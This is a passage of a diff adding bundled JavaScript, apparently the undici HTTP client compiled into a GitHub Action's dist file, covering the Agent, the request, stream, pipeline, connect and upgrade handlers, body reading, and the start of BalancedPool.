+const DispatcherBase = __nccwpck_require__(4839) +const Pool = __nccwpck_require__(4634) +const Client = __nccwpck_require__(3598) +const util = __nccwpck_require__(3983) +const createRedirectInterceptor = __nccwpck_require__(8861) +const { WeakRef, FinalizationRegistry } = __nccwpck_require__(6436)() + +const kOnConnect = Symbol('onConnect') +const kOnDisconnect = Symbol('onDisconnect') +const kOnConnectionError = Symbol('onConnectionError') +const kMaxRedirections = Symbol('maxRedirections') +const kOnDrain = Symbol('onDrain') +const kFactory = Symbol('factory') +const kFinalizer = Symbol('finalizer') +const kOptions = Symbol('options') + +function defaultFactory (origin, opts) { + return opts && opts.connections === 1 + ? new Client(origin, opts) + : new Pool(origin, opts) +} + +class Agent extends DispatcherBase { + constructor ({ factory = defaultFactory, maxRedirections = 0, connect, ...options } = {}) { + super() + + if (typeof factory !== 'function') { + throw new InvalidArgumentError('factory must be a function.') + } + + if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { + throw new InvalidArgumentError('connect must be a function or an object') + } + + if (!Number.isInteger(maxRedirections) || maxRedirections < 0) { + throw new InvalidArgumentError('maxRedirections must be a positive number') + } + + if (connect && typeof connect !== 'function') { + connect = { ...connect } + } + + this[kInterceptors] = options.interceptors && options.interceptors.Agent && Array.isArray(options.interceptors.Agent) + ? options.interceptors.Agent + : [createRedirectInterceptor({ maxRedirections })] + + this[kOptions] = { ...util.deepClone(options), connect } + this[kOptions].interceptors = options.interceptors + ? { ...options.interceptors } + : undefined + this[kMaxRedirections] = maxRedirections + this[kFactory] = factory + this[kClients] = new Map() + this[kFinalizer] = new FinalizationRegistry(/* istanbul ignore next: gc is undeterministic */ key => { + const ref = this[kClients].get(key) + if (ref !== undefined && ref.deref() === undefined) { + this[kClients].delete(key) + } + }) + + const agent = this + + this[kOnDrain] = (origin, targets) => { + agent.emit('drain', origin, [agent, ...targets]) + } + + this[kOnConnect] = (origin, targets) => { + agent.emit('connect', origin, [agent, ...targets]) + } + + this[kOnDisconnect] = (origin, targets, err) => { + agent.emit('disconnect', origin, [agent, ...targets], err) + } + + this[kOnConnectionError] = (origin, targets, err) => { + agent.emit('connectionError', origin, [agent, ...targets], err) + } + } + + get [kRunning] () { + let ret = 0 + for (const ref of this[kClients].values()) { + const client = ref.deref() + /* istanbul ignore next: gc is undeterministic */ + if (client) { + ret += client[kRunning] + } + } + return ret + } + + [kDispatch] (opts, handler) { + let key + if (opts.origin && (typeof opts.origin === 'string' || opts.origin instanceof URL)) { + key = String(opts.origin) + } else { + throw new InvalidArgumentError('opts.origin must be a non-empty string or URL.') + } + + const ref = this[kClients].get(key) + + let dispatcher = ref ? ref.deref() : null + if (!dispatcher) { + dispatcher = this[kFactory](opts.origin, this[kOptions]) + .on('drain', this[kOnDrain]) + .on('connect', this[kOnConnect]) + .on('disconnect', this[kOnDisconnect]) + .on('connectionError', this[kOnConnectionError]) + + this[kClients].set(key, new WeakRef(dispatcher)) + this[kFinalizer].register(dispatcher, key) + } + + return dispatcher.dispatch(opts, handler) + } + + async [kClose] () { + const closePromises = [] + for (const ref of this[kClients].values()) { + const client = ref.deref() + /* istanbul ignore else: gc is undeterministic */ + if (client) { + closePromises.push(client.close()) + } + } + + await Promise.all(closePromises) + } + + async [kDestroy] (err) { + const destroyPromises = [] + for (const ref of this[kClients].values()) { + const client = ref.deref() + /* istanbul ignore else: gc is undeterministic */ + if (client) { + destroyPromises.push(client.destroy(err)) + } + } + + await Promise.all(destroyPromises) + } +} + +module.exports = Agent + + +/***/ }), + +/***/ 7032: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const { addAbortListener } = __nccwpck_require__(3983) +const { RequestAbortedError } = __nccwpck_require__(8045) + +const kListener = Symbol('kListener') +const kSignal = Symbol('kSignal') + +function abort (self) { + if (self.abort) { + self.abort() + } else { + self.onError(new RequestAbortedError()) + } +} + +function addSignal (self, signal) { + self[kSignal] = null + self[kListener] = null + + if (!signal) { + return + } + + if (signal.aborted) { + abort(self) + return + } + + self[kSignal] = signal + self[kListener] = () => { + abort(self) + } + + addAbortListener(self[kSignal], self[kListener]) +} + +function removeSignal (self) { + if (!self[kSignal]) { + return + } + + if ('removeEventListener' in self[kSignal]) { + self[kSignal].removeEventListener('abort', self[kListener]) + } else { + self[kSignal].removeListener('abort', self[kListener]) + } + + self[kSignal] = null + self[kListener] = null +} + +module.exports = { + addSignal, + removeSignal +} + + +/***/ }), + +/***/ 9744: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { AsyncResource } = __nccwpck_require__(852) +const { InvalidArgumentError, RequestAbortedError, SocketError } = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { addSignal, removeSignal } = __nccwpck_require__(7032) + +class ConnectHandler extends AsyncResource { + constructor (opts, callback) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + const { signal, opaque, responseHeaders } = opts + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + super('UNDICI_CONNECT') + + this.opaque = opaque || null + this.responseHeaders = responseHeaders || null + this.callback = callback + this.abort = null + + addSignal(this, signal) + } + + onConnect (abort, context) { + if (!this.callback) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = context + } + + onHeaders () { + throw new SocketError('bad connect', null) + } + + onUpgrade (statusCode, rawHeaders, socket) { + const { callback, opaque, context } = this + + removeSignal(this) + + this.callback = null + + let headers = rawHeaders + // Indicates is an HTTP2Session + if (headers != null) { + headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + } + + this.runInAsyncScope(callback, null, null, { + statusCode, + headers, + socket, + opaque, + context + }) + } + + onError (err) { + const { callback, opaque } = this + + removeSignal(this) + + if (callback) { + this.callback = null + queueMicrotask(() => { + this.runInAsyncScope(callback, null, err, { opaque }) + }) + } + } +} + +function connect (opts, callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + connect.call(this, opts, (err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + try { + const connectHandler = new ConnectHandler(opts, callback) + this.dispatch({ ...opts, method: 'CONNECT' }, connectHandler) + } catch (err) { + if (typeof callback !== 'function') { + throw err + } + const opaque = opts && opts.opaque + queueMicrotask(() => callback(err, { opaque })) + } +} + +module.exports = connect + + +/***/ }), + +/***/ 8752: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + Readable, + Duplex, + PassThrough +} = __nccwpck_require__(2781) +const { + InvalidArgumentError, + InvalidReturnValueError, + RequestAbortedError +} = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { AsyncResource } = __nccwpck_require__(852) +const { addSignal, removeSignal } = __nccwpck_require__(7032) +const assert = __nccwpck_require__(9491) + +const kResume = Symbol('resume') + +class PipelineRequest extends Readable { + constructor () { + super({ autoDestroy: true }) + + this[kResume] = null + } + + _read () { + const { [kResume]: resume } = this + + if (resume) { + this[kResume] = null + resume() + } + } + + _destroy (err, callback) { + this._read() + + callback(err) + } +} + +class PipelineResponse extends Readable { + constructor (resume) { + super({ autoDestroy: true }) + this[kResume] = resume + } + + _read () { + this[kResume]() + } + + _destroy (err, callback) { + if (!err && !this._readableState.endEmitted) { + err = new RequestAbortedError() + } + + callback(err) + } +} + +class PipelineHandler extends AsyncResource { + constructor (opts, handler) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + if (typeof handler !== 'function') { + throw new InvalidArgumentError('invalid handler') + } + + const { signal, method, opaque, onInfo, responseHeaders } = opts + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + if (method === 'CONNECT') { + throw new InvalidArgumentError('invalid method') + } + + if (onInfo && typeof onInfo !== 'function') { + throw new InvalidArgumentError('invalid onInfo callback') + } + + super('UNDICI_PIPELINE') + + this.opaque = opaque || null + this.responseHeaders = responseHeaders || null + this.handler = handler + this.abort = null + this.context = null + this.onInfo = onInfo || null + + this.req = new PipelineRequest().on('error', util.nop) + + this.ret = new Duplex({ + readableObjectMode: opts.objectMode, + autoDestroy: true, + read: () => { + const { body } = this + + if (body && body.resume) { + body.resume() + } + }, + write: (chunk, encoding, callback) => { + const { req } = this + + if (req.push(chunk, encoding) || req._readableState.destroyed) { + callback() + } else { + req[kResume] = callback + } + }, + destroy: (err, callback) => { + const { body, req, res, ret, abort } = this + + if (!err && !ret._readableState.endEmitted) { + err = new RequestAbortedError() + } + + if (abort && err) { + abort() + } + + util.destroy(body, err) + util.destroy(req, err) + util.destroy(res, err) + + removeSignal(this) + + callback(err) + } + }).on('prefinish', () => { + const { req } = this + + // Node < 15 does not call _final in same tick. + req.push(null) + }) + + this.res = null + + addSignal(this, signal) + } + + onConnect (abort, context) { + const { ret, res } = this + + assert(!res, 'pipeline cannot be retried') + + if (ret.destroyed) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = context + } + + onHeaders (statusCode, rawHeaders, resume) { + const { opaque, handler, context } = this + + if (statusCode < 200) { + if (this.onInfo) { + const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + this.onInfo({ statusCode, headers }) + } + return + } + + this.res = new PipelineResponse(resume) + + let body + try { + this.handler = null + const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + body = this.runInAsyncScope(handler, null, { + statusCode, + headers, + opaque, + body: this.res, + context + }) + } catch (err) { + this.res.on('error', util.nop) + throw err + } + + if (!body || typeof body.on !== 'function') { + throw new InvalidReturnValueError('expected Readable') + } + + body + .on('data', (chunk) => { + const { ret, body } = this + + if (!ret.push(chunk) && body.pause) { + body.pause() + } + }) + .on('error', (err) => { + const { ret } = this + + util.destroy(ret, err) + }) + .on('end', () => { + const { ret } = this + + ret.push(null) + }) + .on('close', () => { + const { ret } = this + + if (!ret._readableState.ended) { + util.destroy(ret, new RequestAbortedError()) + } + }) + + this.body = body + } + + onData (chunk) { + const { res } = this + return res.push(chunk) + } + + onComplete (trailers) { + const { res } = this + res.push(null) + } + + onError (err) { + const { ret } = this + this.handler = null + util.destroy(ret, err) + } +} + +function pipeline (opts, handler) { + try { + const pipelineHandler = new PipelineHandler(opts, handler) + this.dispatch({ ...opts, body: pipelineHandler.req }, pipelineHandler) + return pipelineHandler.ret + } catch (err) { + return new PassThrough().destroy(err) + } +} + +module.exports = pipeline + + +/***/ }), + +/***/ 5448: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Readable = __nccwpck_require__(3858) +const { + InvalidArgumentError, + RequestAbortedError +} = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { getResolveErrorBodyCallback } = __nccwpck_require__(7474) +const { AsyncResource } = __nccwpck_require__(852) +const { addSignal, removeSignal } = __nccwpck_require__(7032) + +class RequestHandler extends AsyncResource { + constructor (opts, callback) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + const { signal, method, opaque, body, onInfo, responseHeaders, throwOnError, highWaterMark } = opts + + try { + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + if (highWaterMark && (typeof highWaterMark !== 'number' || highWaterMark < 0)) { + throw new InvalidArgumentError('invalid highWaterMark') + } + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + if (method === 'CONNECT') { + throw new InvalidArgumentError('invalid method') + } + + if (onInfo && typeof onInfo !== 'function') { + throw new InvalidArgumentError('invalid onInfo callback') + } + + super('UNDICI_REQUEST') + } catch (err) { + if (util.isStream(body)) { + util.destroy(body.on('error', util.nop), err) + } + throw err + } + + this.responseHeaders = responseHeaders || null + this.opaque = opaque || null + this.callback = callback + this.res = null + this.abort = null + this.body = body + this.trailers = {} + this.context = null + this.onInfo = onInfo || null + this.throwOnError = throwOnError + this.highWaterMark = highWaterMark + + if (util.isStream(body)) { + body.on('error', (err) => { + this.onError(err) + }) + } + + addSignal(this, signal) + } + + onConnect (abort, context) { + if (!this.callback) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = context + } + + onHeaders (statusCode, rawHeaders, resume, statusMessage) { + const { callback, opaque, abort, context, responseHeaders, highWaterMark } = this + + const headers = responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + + if (statusCode < 200) { + if (this.onInfo) { + this.onInfo({ statusCode, headers }) + } + return + } + + const parsedHeaders = responseHeaders === 'raw' ? util.parseHeaders(rawHeaders) : headers + const contentType = parsedHeaders['content-type'] + const body = new Readable({ resume, abort, contentType, highWaterMark }) + + this.callback = null + this.res = body + if (callback !== null) { + if (this.throwOnError && statusCode >= 400) { + this.runInAsyncScope(getResolveErrorBodyCallback, null, + { callback, body, contentType, statusCode, statusMessage, headers } + ) + } else { + this.runInAsyncScope(callback, null, null, { + statusCode, + headers, + trailers: this.trailers, + opaque, + body, + context + }) + } + } + } + + onData (chunk) { + const { res } = this + return res.push(chunk) + } + + onComplete (trailers) { + const { res } = this + + removeSignal(this) + + util.parseHeaders(trailers, this.trailers) + + res.push(null) + } + + onError (err) { + const { res, callback, body, opaque } = this + + removeSignal(this) + + if (callback) { + // TODO: Does this need queueMicrotask? + this.callback = null + queueMicrotask(() => { + this.runInAsyncScope(callback, null, err, { opaque }) + }) + } + + if (res) { + this.res = null + // Ensure all queued handlers are invoked before destroying res. + queueMicrotask(() => { + util.destroy(res, err) + }) + } + + if (body) { + this.body = null + util.destroy(body, err) + } + } +} + +function request (opts, callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + request.call(this, opts, (err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + try { + this.dispatch(opts, new RequestHandler(opts, callback)) + } catch (err) { + if (typeof callback !== 'function') { + throw err + } + const opaque = opts && opts.opaque + queueMicrotask(() => callback(err, { opaque })) + } +} + +module.exports = request +module.exports.RequestHandler = RequestHandler + + +/***/ }), + +/***/ 5395: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { finished, PassThrough } = __nccwpck_require__(2781) +const { + InvalidArgumentError, + InvalidReturnValueError, + RequestAbortedError +} = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { getResolveErrorBodyCallback } = __nccwpck_require__(7474) +const { AsyncResource } = __nccwpck_require__(852) +const { addSignal, removeSignal } = __nccwpck_require__(7032) + +class StreamHandler extends AsyncResource { + constructor (opts, factory, callback) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + const { signal, method, opaque, body, onInfo, responseHeaders, throwOnError } = opts + + try { + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + if (typeof factory !== 'function') { + throw new InvalidArgumentError('invalid factory') + } + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + if (method === 'CONNECT') { + throw new InvalidArgumentError('invalid method') + } + + if (onInfo && typeof onInfo !== 'function') { + throw new InvalidArgumentError('invalid onInfo callback') + } + + super('UNDICI_STREAM') + } catch (err) { + if (util.isStream(body)) { + util.destroy(body.on('error', util.nop), err) + } + throw err + } + + this.responseHeaders = responseHeaders || null + this.opaque = opaque || null + this.factory = factory + this.callback = callback + this.res = null + this.abort = null + this.context = null + this.trailers = null + this.body = body + this.onInfo = onInfo || null + this.throwOnError = throwOnError || false + + if (util.isStream(body)) { + body.on('error', (err) => { + this.onError(err) + }) + } + + addSignal(this, signal) + } + + onConnect (abort, context) { + if (!this.callback) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = context + } + + onHeaders (statusCode, rawHeaders, resume, statusMessage) { + const { factory, opaque, context, callback, responseHeaders } = this + + const headers = responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + + if (statusCode < 200) { + if (this.onInfo) { + this.onInfo({ statusCode, headers }) + } + return + } + + this.factory = null + + let res + + if (this.throwOnError && statusCode >= 400) { + const parsedHeaders = responseHeaders === 'raw' ? util.parseHeaders(rawHeaders) : headers + const contentType = parsedHeaders['content-type'] + res = new PassThrough() + + this.callback = null + this.runInAsyncScope(getResolveErrorBodyCallback, null, + { callback, body: res, contentType, statusCode, statusMessage, headers } + ) + } else { + if (factory === null) { + return + } + + res = this.runInAsyncScope(factory, null, { + statusCode, + headers, + opaque, + context + }) + + if ( + !res || + typeof res.write !== 'function' || + typeof res.end !== 'function' || + typeof res.on !== 'function' + ) { + throw new InvalidReturnValueError('expected Writable') + } + + // TODO: Avoid finished. It registers an unnecessary amount of listeners. + finished(res, { readable: false }, (err) => { + const { callback, res, opaque, trailers, abort } = this + + this.res = null + if (err || !res.readable) { + util.destroy(res, err) + } + + this.callback = null + this.runInAsyncScope(callback, null, err || null, { opaque, trailers }) + + if (err) { + abort() + } + }) + } + + res.on('drain', resume) + + this.res = res + + const needDrain = res.writableNeedDrain !== undefined + ? res.writableNeedDrain + : res._writableState && res._writableState.needDrain + + return needDrain !== true + } + + onData (chunk) { + const { res } = this + + return res ? res.write(chunk) : true + } + + onComplete (trailers) { + const { res } = this + + removeSignal(this) + + if (!res) { + return + } + + this.trailers = util.parseHeaders(trailers) + + res.end() + } + + onError (err) { + const { res, callback, opaque, body } = this + + removeSignal(this) + + this.factory = null + + if (res) { + this.res = null + util.destroy(res, err) + } else if (callback) { + this.callback = null + queueMicrotask(() => { + this.runInAsyncScope(callback, null, err, { opaque }) + }) + } + + if (body) { + this.body = null + util.destroy(body, err) + } + } +} + +function stream (opts, factory, callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + stream.call(this, opts, factory, (err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + try { + this.dispatch(opts, new StreamHandler(opts, factory, callback)) + } catch (err) { + if (typeof callback !== 'function') { + throw err + } + const opaque = opts && opts.opaque + queueMicrotask(() => callback(err, { opaque })) + } +} + +module.exports = stream + + +/***/ }), + +/***/ 6923: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { InvalidArgumentError, RequestAbortedError, SocketError } = __nccwpck_require__(8045) +const { AsyncResource } = __nccwpck_require__(852) +const util = __nccwpck_require__(3983) +const { addSignal, removeSignal } = __nccwpck_require__(7032) +const assert = __nccwpck_require__(9491) + +class UpgradeHandler extends AsyncResource { + constructor (opts, callback) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + const { signal, opaque, responseHeaders } = opts + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + super('UNDICI_UPGRADE') + + this.responseHeaders = responseHeaders || null + this.opaque = opaque || null + this.callback = callback + this.abort = null + this.context = null + + addSignal(this, signal) + } + + onConnect (abort, context) { + if (!this.callback) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = null + } + + onHeaders () { + throw new SocketError('bad upgrade', null) + } + + onUpgrade (statusCode, rawHeaders, socket) { + const { callback, opaque, context } = this + + assert.strictEqual(statusCode, 101) + + removeSignal(this) + + this.callback = null + const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + this.runInAsyncScope(callback, null, null, { + headers, + socket, + opaque, + context + }) + } + + onError (err) { + const { callback, opaque } = this + + removeSignal(this) + + if (callback) { + this.callback = null + queueMicrotask(() => { + this.runInAsyncScope(callback, null, err, { opaque }) + }) + } + } +} + +function upgrade (opts, callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + upgrade.call(this, opts, (err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + try { + const upgradeHandler = new UpgradeHandler(opts, callback) + this.dispatch({ + ...opts, + method: opts.method || 'GET', + upgrade: opts.protocol || 'Websocket' + }, upgradeHandler) + } catch (err) { + if (typeof callback !== 'function') { + throw err + } + const opaque = opts && opts.opaque + queueMicrotask(() => callback(err, { opaque })) + } +} + +module.exports = upgrade + + +/***/ }), + +/***/ 4059: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +module.exports.request = __nccwpck_require__(5448) +module.exports.stream = __nccwpck_require__(5395) +module.exports.pipeline = __nccwpck_require__(8752) +module.exports.upgrade = __nccwpck_require__(6923) +module.exports.connect = __nccwpck_require__(9744) + + +/***/ }), + +/***/ 3858: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +// Ported from https://github.com/nodejs/undici/pull/907 + + + +const assert = __nccwpck_require__(9491) +const { Readable } = __nccwpck_require__(2781) +const { RequestAbortedError, NotSupportedError, InvalidArgumentError } = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { ReadableStreamFrom, toUSVString } = __nccwpck_require__(3983) + +let Blob + +const kConsume = Symbol('kConsume') +const kReading = Symbol('kReading') +const kBody = Symbol('kBody') +const kAbort = Symbol('abort') +const kContentType = Symbol('kContentType') + +const noop = () => {} + +module.exports = class BodyReadable extends Readable { + constructor ({ + resume, + abort, + contentType = '', + highWaterMark = 64 * 1024 // Same as nodejs fs streams. + }) { + super({ + autoDestroy: true, + read: resume, + highWaterMark + }) + + this._readableState.dataEmitted = false + + this[kAbort] = abort + this[kConsume] = null + this[kBody] = null + this[kContentType] = contentType + + // Is stream being consumed through Readable API? + // This is an optimization so that we avoid checking + // for 'data' and 'readable' listeners in the hot path + // inside push(). + this[kReading] = false + } + + destroy (err) { + if (this.destroyed) { + // Node < 16 + return this + } + + if (!err && !this._readableState.endEmitted) { + err = new RequestAbortedError() + } + + if (err) { + this[kAbort]() + } + + return super.destroy(err) + } + + emit (ev, ...args) { + if (ev === 'data') { + // Node < 16.7 + this._readableState.dataEmitted = true + } else if (ev === 'error') { + // Node < 16 + this._readableState.errorEmitted = true + } + return super.emit(ev, ...args) + } + + on (ev, ...args) { + if (ev === 'data' || ev === 'readable') { + this[kReading] = true + } + return super.on(ev, ...args) + } + + addListener (ev, ...args) { + return this.on(ev, ...args) + } + + off (ev, ...args) { + const ret = super.off(ev, ...args) + if (ev === 'data' || ev === 'readable') { + this[kReading] = ( + this.listenerCount('data') > 0 || + this.listenerCount('readable') > 0 + ) + } + return ret + } + + removeListener (ev, ...args) { + return this.off(ev, ...args) + } + + push (chunk) { + if (this[kConsume] && chunk !== null && this.readableLength === 0) { + consumePush(this[kConsume], chunk) + return this[kReading] ? super.push(chunk) : true + } + return super.push(chunk) + } + + // https://fetch.spec.whatwg.org/#dom-body-text + async text () { + return consume(this, 'text') + } + + // https://fetch.spec.whatwg.org/#dom-body-json + async json () { + return consume(this, 'json') + } + + // https://fetch.spec.whatwg.org/#dom-body-blob + async blob () { + return consume(this, 'blob') + } + + // https://fetch.spec.whatwg.org/#dom-body-arraybuffer + async arrayBuffer () { + return consume(this, 'arrayBuffer') + } + + // https://fetch.spec.whatwg.org/#dom-body-formdata + async formData () { + // TODO: Implement. + throw new NotSupportedError() + } + + // https://fetch.spec.whatwg.org/#dom-body-bodyused + get bodyUsed () { + return util.isDisturbed(this) + } + + // https://fetch.spec.whatwg.org/#dom-body-body + get body () { + if (!this[kBody]) { + this[kBody] = ReadableStreamFrom(this) + if (this[kConsume]) { + // TODO: Is this the best way to force a lock? + this[kBody].getReader() // Ensure stream is locked. + assert(this[kBody].locked) + } + } + return this[kBody] + } + + dump (opts) { + let limit = opts && Number.isFinite(opts.limit) ? opts.limit : 262144 + const signal = opts && opts.signal + + if (signal) { + try { + if (typeof signal !== 'object' || !('aborted' in signal)) { + throw new InvalidArgumentError('signal must be an AbortSignal') + } + util.throwIfAborted(signal) + } catch (err) { + return Promise.reject(err) + } + } + + if (this.closed) { + return Promise.resolve(null) + } + + return new Promise((resolve, reject) => { + const signalListenerCleanup = signal + ? util.addAbortListener(signal, () => { + this.destroy() + }) + : noop + + this + .on('close', function () { + signalListenerCleanup() + if (signal && signal.aborted) { + reject(signal.reason || Object.assign(new Error('The operation was aborted'), { name: 'AbortError' })) + } else { + resolve(null) + } + }) + .on('error', noop) + .on('data', function (chunk) { + limit -= chunk.length + if (limit <= 0) { + this.destroy() + } + }) + .resume() + }) + } +} + +// https://streams.spec.whatwg.org/#readablestream-locked +function isLocked (self) { + // Consume is an implicit lock. + return (self[kBody] && self[kBody].locked === true) || self[kConsume] +} + +// https://fetch.spec.whatwg.org/#body-unusable +function isUnusable (self) { + return util.isDisturbed(self) || isLocked(self) +} + +async function consume (stream, type) { + if (isUnusable(stream)) { + throw new TypeError('unusable') + } + + assert(!stream[kConsume]) + + return new Promise((resolve, reject) => { + stream[kConsume] = { + type, + stream, + resolve, + reject, + length: 0, + body: [] + } + + stream + .on('error', function (err) { + consumeFinish(this[kConsume], err) + }) + .on('close', function () { + if (this[kConsume].body !== null) { + consumeFinish(this[kConsume], new RequestAbortedError()) + } + }) + + process.nextTick(consumeStart, stream[kConsume]) + }) +} + +function consumeStart (consume) { + if (consume.body === null) { + return + } + + const { _readableState: state } = consume.stream + + for (const chunk of state.buffer) { + consumePush(consume, chunk) + } + + if (state.endEmitted) { + consumeEnd(this[kConsume]) + } else { + consume.stream.on('end', function () { + consumeEnd(this[kConsume]) + }) + } + + consume.stream.resume() + + while (consume.stream.read() != null) { + // Loop + } +} + +function consumeEnd (consume) { + const { type, body, resolve, stream, length } = consume + + try { + if (type === 'text') { + resolve(toUSVString(Buffer.concat(body))) + } else if (type === 'json') { + resolve(JSON.parse(Buffer.concat(body))) + } else if (type === 'arrayBuffer') { + const dst = new Uint8Array(length) + + let pos = 0 + for (const buf of body) { + dst.set(buf, pos) + pos += buf.byteLength + } + + resolve(dst.buffer) + } else if (type === 'blob') { + if (!Blob) { + Blob = (__nccwpck_require__(4300).Blob) + } + resolve(new Blob(body, { type: stream[kContentType] })) + } + + consumeFinish(consume) + } catch (err) { + stream.destroy(err) + } +} + +function consumePush (consume, chunk) { + consume.length += chunk.length + consume.body.push(chunk) +} + +function consumeFinish (consume, err) { + if (consume.body === null) { + return + } + + if (err) { + consume.reject(err) + } else { + consume.resolve() + } + + consume.type = null + consume.stream = null + consume.resolve = null + consume.reject = null + consume.length = 0 + consume.body = null +} + + +/***/ }), + +/***/ 7474: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const assert = __nccwpck_require__(9491) +const { + ResponseStatusCodeError +} = __nccwpck_require__(8045) +const { toUSVString } = __nccwpck_require__(3983) + +async function getResolveErrorBodyCallback ({ callback, body, contentType, statusCode, statusMessage, headers }) { + assert(body) + + let chunks = [] + let limit = 0 + + for await (const chunk of body) { + chunks.push(chunk) + limit += chunk.length + if (limit > 128 * 1024) { + chunks = null + break + } + } + + if (statusCode === 204 || !contentType || !chunks) { + process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers)) + return + } + + try { + if (contentType.startsWith('application/json')) { + const payload = JSON.parse(toUSVString(Buffer.concat(chunks))) + process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers, payload)) + return + } + + if (contentType.startsWith('text/')) { + const payload = toUSVString(Buffer.concat(chunks)) + process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers, payload)) + return + } + } catch (err) { + // Process in a fallback if error + } + + process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers)) +} + +module.exports = { getResolveErrorBodyCallback } + + +/***/ }), + +/***/ 7931: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + BalancedPoolMissingUpstreamError, + InvalidArgumentError +} = __nccwpck_require__(8045) +const { + PoolBase, + kClients, + kNeedDrain, + kAddClient, + kRemoveClient, + kGetDispatcher +} = __nccwpck_require__(3198) +const Pool = __nccwpck_require__(4634) +const { kUrl, kInterceptors } = __nccwpck_require__(2785) +const { parseOrigin } = __nccwpck_require__(3983) +const kFactory = Symbol('factory') + +const kOptions = Symbol('options') +const kGreatestCommonDivisor = Symbol('kGreatestCommonDivisor') +const kCurrentWeight = Symbol('kCurrentWeight') +const kIndex = Symbol('kIndex') +const kWeight = Symbol('kWeight') +const kMaxWeightPerServer = Symbol('kMaxWeightPerServer') +const kErrorPenalty = Symbol('kErrorPenalty') + +function getGreatestCommonDivisor (a, b) { + if (b === 0) return a + return getGreatestCommonDivisor(b, a % b) +} + +function defaultFactory (origin, opts) { + return new Pool(origin, opts) +} + +class BalancedPool extends PoolBase { + constructor (upstreams = [], { factory = defaultFactory, ...opts } = {}) { + super() + + this[kOptions] = opts + this[kIndex] = -1 + this[kCurrentWeight] = 0 + + this[kMaxWeightPerServer] = this[kOptions].maxWeightPerServer || 100 + this[kErrorPenalty] = this[kOptions].errorPenalty || 15 + + if (!Array.isArray(upstreams)) { + upstreams = [upstreams] + } + + if (typeof factory !== 'function') { + throw new InvalidArgumentError('factory must be a function.') + } + + this[kInterceptors] = opts.interceptors && opts.interceptors.BalancedPool && Array.isArray(opts.interceptors.BalancedPool) + ? opts.interceptors.BalancedPool + : [] + this[kFactory] = factory + + for (const upstream of upstreams) { + this.addUpstream(upstream) + } + this._updateBalancedPoolStats() + } + + addUpstream (upstream) { + const 